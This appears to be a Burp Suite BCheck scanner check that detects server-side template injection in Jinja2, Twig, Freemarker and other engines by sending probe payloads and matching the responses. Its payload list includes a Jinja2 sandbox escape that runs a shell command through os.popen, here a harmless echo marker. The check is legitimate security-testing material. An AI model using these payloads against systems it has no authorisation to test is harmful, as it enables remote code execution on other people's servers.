metadata:
    language: v2-beta
    name: "SSTI - Multi Engine Detection with WAF Bypass"
    description: "Tests for SSTI across Jinja2, Twig, Freemarker, Velocity, Pebble, Smarty, Mako"
    author: "BCheck Arsenal"
    tags: "ssti", "rce", "waf-bypass"

run for each:
    payload = "{{444*666}}",
        "${444*666}",
        "#{444*666}",
        "<%= 444*666 %>",
        "${{444*666}}",
        "{{request.__class__.__mro__[2].__subclasses__()}}",
        "{{config.__class__.__init__.__globals__['os'].popen('echo 993421').read()}}"

given insertion point then
    send payload:
        replacing: {payload}

    if not({latest.response.status_code} is "400") then
        if {latest.response} matches "295704" then
            if not({latest.response} matches "444\\*666") then
                report issue:
                    severity: high
                    confidence: firm
                    detail: "Server-side template injection detected. Mathematical expression evaluated server-side without reflection."
                    remediation: "Never pass user input into template strings. Use sandboxed template engines."
            end if
        end if

        if {latest.response} matches "993421" then
            report issue:
                severity: high
                confidence: certain
                detail: "Jinja2 SSTI with RCE detected via unique echo payload."
                remediation: "Use Jinja2 SandboxedEnvironment. Never render user input as template code."
        end if
    end if
